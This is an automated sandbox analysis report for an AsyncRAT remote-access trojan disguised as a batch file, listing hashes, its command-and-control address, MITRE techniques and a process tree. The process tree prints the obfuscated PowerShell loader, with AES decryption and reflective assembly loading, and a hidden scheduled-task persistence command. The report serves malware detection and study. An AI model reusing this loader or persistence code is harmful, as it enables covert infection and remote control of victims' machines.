asyncrat | 69d15a8ca658c1d8713cbd088c4e04833e3915ed13ed0cb6d33bb2995c431986

Analysis

max time kernel
144s
max time network
145s
platform
windows10-ltsc 2021_x64
resource
win10ltsc2021-20241023-en
resource tags

arch:x64arch:x86image:win10ltsc2021-20241023-enlocale:en-usos:windows10-ltsc 2021-x64system
submitted
20-11-2024 20:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

skibidi toilet.bat
Size

388KB
MD5

0380a9d31f2f8313a3a3e90ca34b9f77
SHA1

18813e82100f6d678b298d34b6a87a401c8239de
SHA256

69d15a8ca658c1d8713cbd088c4e04833e3915ed13ed0cb6d33bb2995c431986
SHA512

6113f556d8720bd11b446e021d8eeab5648395958b0953b50d6de9be7ec5d9f5f1a2553f4077ac842b3e7f45fd07c7b0379eeb57d6bd6241c028b68859b7c5f7
SSDEEP

6144:o3u2w8vphGO0vcnEwFWlmyW7yH/mMpzYs4CpUwKidD+N3OghugCCb6ChemLJKaf:oXPpmfwogyWWHFdYsxjjdDngISjtKC

Score

10^/10

asyncrat default execution rat

Malware Config

Extracted

Family

asyncrat

Botnet

Default

193.161.193.99:36700

Attributes

delay
1
install
true
install_file
syskprvalr.exe
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers written in C#.
rat asyncrat
Asyncrat family
asyncrat

Async RAT payload 1 IoCs

rat

resource	yara_rule
behavioral1/memory/736-58-0x0000027C714F0000-0x0000027C71506000-memory.dmp	family_asyncrat

Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2680	powershell.exe
2268	powershell.exe
736	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000\Control Panel\International\Geo\Nation	WScript.exe

Executes dropped EXE 1 IoCs

pid	Process
4772	syskprvalr.exe

Drops file in System32 directory 10 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_CBDCCBFE4F7A916411C1E69BDD97BB04	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\syskprvalr	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan	svchost.exe
File opened for modification	C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work	svchost.exe
File opened for modification	C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506	svchost.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Delays execution with timeout.exe 1 IoCs

evasion

pid	Process
844	timeout.exe

Modifies data under HKEY_USERS 42 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	svchost.exe
Key created	\REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\IdentityCRL\ExtendedProperties\LID = "00188010E600DB34"	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\trust	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Disallowed	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\CA	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot	svchost.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates	svchost.exe

Modifies registry class 8 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1	svchost.exe
Key created	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PCT = "133766093300798754"	svchost.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-87863914-780023816-688321450-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppModel\SystemAppData\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\HAM\AUI\Global.IrisService\V1\LU\PTT = "133766094218515411"	svchost.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
1940	schtasks.exe

Suspicious behavior: EnumeratesProcesses 48 IoCs

pid	Process
2680	powershell.exe
2680	powershell.exe
2268	powershell.exe
2268	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
736	powershell.exe
4772	syskprvalr.exe
4772	syskprvalr.exe

Suspicious behavior: GetForegroundWindowSpam 1 IoCs

pid	Process
3652	Explorer.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2680	powershell.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeIncreaseQuotaPrivilege	2268	powershell.exe
Token: SeSecurityPrivilege	2268	powershell.exe
Token: SeTakeOwnershipPrivilege	2268	powershell.exe
Token: SeLoadDriverPrivilege	2268	powershell.exe
Token: SeSystemProfilePrivilege	2268	powershell.exe
Token: SeSystemtimePrivilege	2268	powershell.exe
Token: SeProfSingleProcessPrivilege	2268	powershell.exe
Token: SeIncBasePriorityPrivilege	2268	powershell.exe
Token: SeCreatePagefilePrivilege	2268	powershell.exe
Token: SeBackupPrivilege	2268	powershell.exe
Token: SeRestorePrivilege	2268	powershell.exe
Token: SeShutdownPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeSystemEnvironmentPrivilege	2268	powershell.exe
Token: SeRemoteShutdownPrivilege	2268	powershell.exe
Token: SeUndockPrivilege	2268	powershell.exe
Token: SeManageVolumePrivilege	2268	powershell.exe
Token: 33	2268	powershell.exe
Token: 34	2268	powershell.exe
Token: 35	2268	powershell.exe
Token: 36	2268	powershell.exe
Token: SeIncreaseQuotaPrivilege	2268	powershell.exe
Token: SeSecurityPrivilege	2268	powershell.exe
Token: SeTakeOwnershipPrivilege	2268	powershell.exe
Token: SeLoadDriverPrivilege	2268	powershell.exe
Token: SeSystemProfilePrivilege	2268	powershell.exe
Token: SeSystemtimePrivilege	2268	powershell.exe
Token: SeProfSingleProcessPrivilege	2268	powershell.exe
Token: SeIncBasePriorityPrivilege	2268	powershell.exe
Token: SeCreatePagefilePrivilege	2268	powershell.exe
Token: SeBackupPrivilege	2268	powershell.exe
Token: SeRestorePrivilege	2268	powershell.exe
Token: SeShutdownPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeSystemEnvironmentPrivilege	2268	powershell.exe
Token: SeRemoteShutdownPrivilege	2268	powershell.exe
Token: SeUndockPrivilege	2268	powershell.exe
Token: SeManageVolumePrivilege	2268	powershell.exe
Token: 33	2268	powershell.exe
Token: 34	2268	powershell.exe
Token: 35	2268	powershell.exe
Token: 36	2268	powershell.exe
Token: SeIncreaseQuotaPrivilege	2268	powershell.exe
Token: SeSecurityPrivilege	2268	powershell.exe
Token: SeTakeOwnershipPrivilege	2268	powershell.exe
Token: SeLoadDriverPrivilege	2268	powershell.exe
Token: SeSystemProfilePrivilege	2268	powershell.exe
Token: SeSystemtimePrivilege	2268	powershell.exe
Token: SeProfSingleProcessPrivilege	2268	powershell.exe
Token: SeIncBasePriorityPrivilege	2268	powershell.exe
Token: SeCreatePagefilePrivilege	2268	powershell.exe
Token: SeBackupPrivilege	2268	powershell.exe
Token: SeRestorePrivilege	2268	powershell.exe
Token: SeShutdownPrivilege	2268	powershell.exe
Token: SeDebugPrivilege	2268	powershell.exe
Token: SeSystemEnvironmentPrivilege	2268	powershell.exe
Token: SeRemoteShutdownPrivilege	2268	powershell.exe
Token: SeUndockPrivilege	2268	powershell.exe
Token: SeManageVolumePrivilege	2268	powershell.exe
Token: 33	2268	powershell.exe
Token: 34	2268	powershell.exe
Token: 35	2268	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 876 wrote to memory of 5004	876	cmd.exe	86
PID 876 wrote to memory of 5004	876	cmd.exe	86
PID 876 wrote to memory of 2680	876	cmd.exe	87
PID 876 wrote to memory of 2680	876	cmd.exe	87
PID 2680 wrote to memory of 2268	2680	powershell.exe	90
PID 2680 wrote to memory of 2268	2680	powershell.exe	90
PID 2680 wrote to memory of 2084	2680	powershell.exe	94
PID 2680 wrote to memory of 2084	2680	powershell.exe	94
PID 2084 wrote to memory of 3628	2084	WScript.exe	96
PID 2084 wrote to memory of 3628	2084	WScript.exe	96
PID 3628 wrote to memory of 3192	3628	cmd.exe	98
PID 3628 wrote to memory of 3192	3628	cmd.exe	98
PID 3628 wrote to memory of 736	3628	cmd.exe	99
PID 3628 wrote to memory of 736	3628	cmd.exe	99
PID 736 wrote to memory of 3652	736	powershell.exe	57
PID 736 wrote to memory of 3540	736	powershell.exe	72
PID 736 wrote to memory of 1564	736	powershell.exe	26
PID 736 wrote to memory of 5100	736	powershell.exe	67
PID 736 wrote to memory of 1944	736	powershell.exe	35
PID 736 wrote to memory of 1808	736	powershell.exe	31
PID 736 wrote to memory of 2728	736	powershell.exe	45
PID 736 wrote to memory of 1348	736	powershell.exe	23
PID 736 wrote to memory of 1932	736	powershell.exe	34
PID 736 wrote to memory of 2408	736	powershell.exe	71
PID 736 wrote to memory of 1336	736	powershell.exe	22
PID 736 wrote to memory of 744	736	powershell.exe	15
PID 736 wrote to memory of 2316	736	powershell.exe	41
PID 736 wrote to memory of 1920	736	powershell.exe	33
PID 736 wrote to memory of 3296	736	powershell.exe	74
PID 736 wrote to memory of 3096	736	powershell.exe	52
PID 736 wrote to memory of 1320	736	powershell.exe	21
PID 736 wrote to memory of 1708	736	powershell.exe	30
PID 736 wrote to memory of 520	736	powershell.exe	14
PID 736 wrote to memory of 1228	736	powershell.exe	19
PID 736 wrote to memory of 2880	736	powershell.exe	49
PID 736 wrote to memory of 908	736	powershell.exe	11
PID 736 wrote to memory of 2276	736	powershell.exe	40
PID 736 wrote to memory of 1088	736	powershell.exe	18
PID 736 wrote to memory of 956	736	powershell.exe	12
PID 736 wrote to memory of 4420	736	powershell.exe	92
PID 736 wrote to memory of 2836	736	powershell.exe	48
PID 736 wrote to memory of 1540	736	powershell.exe	100
PID 736 wrote to memory of 660	736	powershell.exe	68
PID 736 wrote to memory of 1644	736	powershell.exe	37
PID 736 wrote to memory of 1044	736	powershell.exe	16
PID 736 wrote to memory of 1240	736	powershell.exe	20
PID 736 wrote to memory of 3796	736	powershell.exe	58
PID 736 wrote to memory of 1628	736	powershell.exe	29
PID 736 wrote to memory of 2808	736	powershell.exe	46
PID 736 wrote to memory of 1620	736	powershell.exe	28
PID 736 wrote to memory of 1816	736	powershell.exe	32
PID 736 wrote to memory of 3284	736	powershell.exe	55
PID 736 wrote to memory of 2008	736	powershell.exe	36
PID 736 wrote to memory of 2596	736	powershell.exe	44
PID 736 wrote to memory of 2196	736	powershell.exe	39
PID 736 wrote to memory of 2588	736	powershell.exe	43
PID 736 wrote to memory of 1576	736	powershell.exe	27
PID 736 wrote to memory of 1400	736	powershell.exe	25
PID 736 wrote to memory of 2380	736	powershell.exe	42
PID 736 wrote to memory of 1392	736	powershell.exe	24
PID 736 wrote to memory of 3556	736	powershell.exe	56
PID 736 wrote to memory of 796	736	powershell.exe	10
PID 736 wrote to memory of 400	736	powershell.exe	13
PID 736 wrote to memory of 1980	736	powershell.exe	102

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
- Modifies registry class
PID:796

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:908

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:956

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:400

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:520

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:744

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1044

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:1088

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1228

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1240

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
- Drops file in System32 directory
PID:1320

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1336

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1348

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1400

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1564

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1576

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1620

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1628

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1708

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:1920

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1932

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1944

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2008

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1644

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2196

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2276

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
PID:2316

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2380

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2588

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2596

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2728

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2808

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2836

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2880

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:3096

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:3284

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3556

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: GetForegroundWindowSpam
PID:3652
- C:\Windows\system32\cmd.exe
  C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\skibidi toilet.bat"
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:876
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPhTYHGGaK5kR6WZsuoVhlIwb+IqmKt8baaxuijRuI4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Z1JlipVIlWVZFlcCvp9zRw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZTmBJ=New-Object System.IO.MemoryStream(,$param_var); $pGmqB=New-Object System.IO.MemoryStream; $vofyh=New-Object System.IO.Compression.GZipStream($ZTmBJ, [IO.Compression.CompressionMode]::Decompress); $vofyh.CopyTo($pGmqB); $vofyh.Dispose(); $ZTmBJ.Dispose(); $pGmqB.Dispose(); $pGmqB.ToArray();}function execute_function($param_var,$param2_var){ $DYWjL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ncJGU=$DYWjL.EntryPoint; $ncJGU.Invoke($null, $param2_var);}$iDcUp = 'C:\Users\Admin\AppData\Local\Temp\skibidi toilet.bat';$host.UI.RawUI.WindowTitle = $iDcUp;$WZHtU=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($iDcUp).Split([Environment]::NewLine);foreach ($wZzpc in $WZHtU) { if ($wZzpc.StartsWith('NYmtFIDAzglHySitKOHK')) { $YPjeF=$wZzpc.Substring(20); break; }}$payloads_var=[string[]]$YPjeF.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
    3⤵
    PID:5004
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
    3⤵
    - Command and Scripting Interpreter: PowerShell
    - Modifies registry class
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2680
  - - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Register-ScheduledTask -TaskName '$phantom-RuntimeBroker_startup_300_str' -Trigger (New-ScheduledTaskTrigger -AtLogon) -Action (New-ScheduledTaskAction -Execute 'C:\Users\Admin\AppData\Roaming\$phantom-startup_str_300.vbs') -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -Hidden -ExecutionTimeLimit 0) -RunLevel Highest -Force
      4⤵
      Command and Scripting Interpreter: PowerShell
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      PID:2268
  - - C:\Windows\System32\WScript.exe
      "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\$phantom-startup_str_300.vbs"
      4⤵
      Checks computer location settings
      Suspicious use of WriteProcessMemory
      PID:2084
    - - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\$phantom-startup_str_300.bat" "
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:3628
      - C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPhTYHGGaK5kR6WZsuoVhlIwb+IqmKt8baaxuijRuI4='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Z1JlipVIlWVZFlcCvp9zRw=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $ZTmBJ=New-Object System.IO.MemoryStream(,$param_var); $pGmqB=New-Object System.IO.MemoryStream; $vofyh=New-Object System.IO.Compression.GZipStream($ZTmBJ, [IO.Compression.CompressionMode]::Decompress); $vofyh.CopyTo($pGmqB); $vofyh.Dispose(); $ZTmBJ.Dispose(); $pGmqB.Dispose(); $pGmqB.ToArray();}function execute_function($param_var,$param2_var){ $DYWjL=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $ncJGU=$DYWjL.EntryPoint; $ncJGU.Invoke($null, $param2_var);}$iDcUp = 